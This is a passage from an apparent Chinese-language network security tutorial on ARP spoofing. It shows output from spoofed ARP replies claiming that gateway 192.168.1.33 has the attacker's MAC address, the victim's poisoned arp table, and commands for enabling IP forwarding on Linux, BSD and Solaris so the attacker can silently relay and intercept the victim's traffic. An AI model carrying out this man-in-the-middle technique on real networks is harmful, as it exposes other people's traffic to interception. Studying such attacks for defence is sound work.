8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
8:0:20:c8:fe:150:50:ba:1a:f:c0080642:arpreply192.168.1.33is-at8:0:20:c8:fe:15
可以看到b机持续向a发送arp回应包,宣称网关192.168.1.33的mac地址是自己!此时,我们在a机上看看arp表的内容,
C:>arp-a
Interface:192.168.1.37
InternetAddressPhysicalAddressType
192.168.1.3308-00-20-c8-fe-15dynamic
哈!a机的arp表已经改变了,网关的mac地址被更新为了b机的mac地址,这样,当有数据包发送时,a机理所当然的会发到它arp表中网关对应的mac地址08-00-20-c8-fe-15,然而这个地方的b机正在等待着,悄然无声的冒充网关收发着a机的数据包。
有一点要说明的是,为了让a机能正常使用网络,b机还必须打开数据转发,
linux中可以使用sysctl-wnet.ipv4.ip_forward=1
bsd系统可以使用sysctl-wnet.inet.ip.forwarding=1
solaris系统可以使用ndd-set/dev/ipip_forwarding1
除了这样打开内核的支持外,也可以选用外部的fragrouter等转发软件,如此,就能确保a机正常工作了。